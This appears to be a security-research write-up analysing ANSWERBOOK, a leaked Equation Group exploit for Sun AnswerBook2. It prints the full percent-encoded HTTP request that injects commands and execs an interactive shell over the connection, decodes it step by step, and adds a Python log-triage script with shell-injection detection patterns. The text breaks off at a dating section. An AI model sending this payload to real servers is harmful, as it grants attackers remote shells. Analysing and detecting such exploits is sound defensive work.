stoicsurgeon

Equation Group Research

ANSWERBOOK

ANSWERBOOK is an RCE exploit for Sun AnswerBook2. Given the software and the opsnotes, it was most likely used around 2000-2005.

According to abopscript.txt it triggers a shell using the following HTTP GET request:

GET /ab2/@LegacyPageView?ps=`echo%20"\%0A(/bin/ksh<<\%2B%0As=63%0Awhile%20[%20ABC%20-gt%208%20]%0Ado%0A[[%20-S%20/dev/fd/ABC%20]]%20%26%26%20break%0A((s=ABC-1))%0Adone%0A[%20ABC%20-gt%208%20]%20%26%26%20exec%20sh%20-i%20</dev/fd/ABC%20>%20/dev/fd/ABC%202>%261%20%26%0A%2B%0A)2>/dev/null%26%0A"%20|%20sed%20's/ABC/$s/g'%20|%20sh` HTTP/1.0

Cleaning up the command a bit (percent-decoding the query string and dropping the outer backticks):

echo "\
(/bin/ksh<<\+
s=63
while [ ABC -gt 8 ]
do
[[ -S /dev/fd/ABC ]] && break
((s=ABC-1))
done
[ ABC -gt 8 ] && exec sh -i </dev/fd/ABC > /dev/fd/ABC 2>&1 &
+
)2>/dev/null&
" | sed 's/ABC/$s/g' | sh

After echo and sed have run (echo drops the backslash-newline inside the double quotes, and sed replaces every ABC with the literal string $s), sh executes this:

(/bin/ksh<<\+
	s=63
	while [ $s -gt 8 ]
	do
		[[ -S /dev/fd/$s ]] && break
		((s=$s-1))
	done
	[ $s -gt 8 ] && exec sh -i </dev/fd/$s > /dev/fd/$s 2>&1 &
+
)2>/dev/null &

The text from <<\+ up to the line holding only + is a here-document, so those lines are fed to /bin/ksh (the backslash in \+ stops sh from expanding $s itself; ksh does the expansion). The loop counts down from descriptor 63 and stops at the first file descriptor above 8 that is a socket (in practice the connection the request arrived on); it then execs an interactive shell with its input and output redirected to that socket, giving the operator a shell over the existing connection.
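The two clean-up steps above can be reproduced mechanically, which is also how a log-triage rule would look at this request: percent-decode the query parameter, emulate the echo/sed stage, and count generic shell-injection indicators in the decoded request target. The following script is an added example and is not part of the original analysis or of the leaked tooling; the request line is the one quoted above, the benign requests and the indicator list are constructed for illustration, and only the Python standard library is used.

```python
"""Added example (not from the original analysis): decode the ANSWERBOOK request
line the way the two clean-up steps above do, and flag the command-injection
indicators a web-log triage rule would key on."""
import re
from urllib.parse import unquote

# Constructed sample: the request line quoted above, split only for readability.
REQUEST_LINE = (
    r"""GET /ab2/@LegacyPageView?ps=`echo%20"\%0A(/bin/ksh<<\%2B%0As=63%0A"""
    r"""while%20[%20ABC%20-gt%208%20]%0Ado%0A[[%20-S%20/dev/fd/ABC%20]]%20%26%26%20break%0A"""
    r"""((s=ABC-1))%0Adone%0A[%20ABC%20-gt%208%20]%20%26%26%20exec%20sh%20-i%20"""
    r"""</dev/fd/ABC%20>%20/dev/fd/ABC%202>%261%20%26%0A"""
    r"""%2B%0A)2>/dev/null%26%0A"%20|%20sed%20's/ABC/$s/g'%20|%20sh` HTTP/1.0"""
)

# Constructed benign requests for comparison (hypothetical paths).
SAMPLE_REQUESTS = [
    REQUEST_LINE,
    "GET /ab2/@LegacyPageView?ps=index.html HTTP/1.0",
    "GET /ab2/Search?q=a%3C%3Cb HTTP/1.0",   # one stray '<<' after decoding
]


def request_target(line):
    """Return the request-target part of 'METHOD target HTTP/x.y'."""
    _method, rest = line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    return target


def decoded_param(line, name="ps"):
    """Percent-decode one query parameter; this is the first clean-up step."""
    _path, _sep, query = request_target(line).partition("?")
    for pair in query.split("&"):   # the payload encodes its own '&' as %26
        key, _sep, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def final_script(decoded):
    """Emulate what `echo "..." | sed 's/X/Y/g'` hands to sh: drop the
    backslash-newline continuations that double quotes remove, then apply
    the sed substitution literally.  This is the second clean-up step."""
    body = re.search(r'echo "(.*)" \| sed', decoded, re.S).group(1)
    body = body.replace("\\\n", "")
    sed = re.search(r"sed 's/([^/']+)/([^/']+)/g'", decoded)
    return body.replace(sed.group(1), sed.group(2))


# Generic shell-injection indicators, evaluated on the decoded request target.
INDICATORS = {
    "newline in query": re.compile(r"\n"),
    "command substitution": re.compile(r"`|\$\("),
    "here-document": re.compile(r"<<"),
    "shell binary": re.compile(r"/bin/(?:k|ba)?sh\b|\bsh -i\b"),
    "fd redirection": re.compile(r"/dev/fd/"),
    "pipe to shell": re.compile(r"\|\s*sh\b"),
}


def indicators(line):
    """Names of the indicators present in one request line, after decoding."""
    text = unquote(request_target(line))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def triage(request_lines, threshold=2):
    """Return (index, indicators) for lines with at least `threshold` hits;
    a single stray '<<' or '|' in ordinary traffic stays below it."""
    hits = []
    for i, line in enumerate(request_lines):
        found = indicators(line)
        if len(found) >= threshold:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    print(final_script(decoded_param(REQUEST_LINE)))
    for i, found in triage(SAMPLE_REQUESTS):
        print(f"request {i}: {', '.join(found)}")
```

Run as a script it prints the same ksh script shown in the second clean-up and reports request 0 with all six indicators; the two constructed benign requests score zero and one respectively and stay under the threshold. The indicator list is deliberately generic (decoded newlines, backticks, here-documents, shell binaries, /dev/fd paths, pipes into sh), so the same rule catches other command-injection payloads rather than just this one string.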

Reason for 2000-2005

Above, I mention somewhat vaguely that, according to the opsnotes and the software, the exploit was used in the period 2000-2005. The reasons for this are: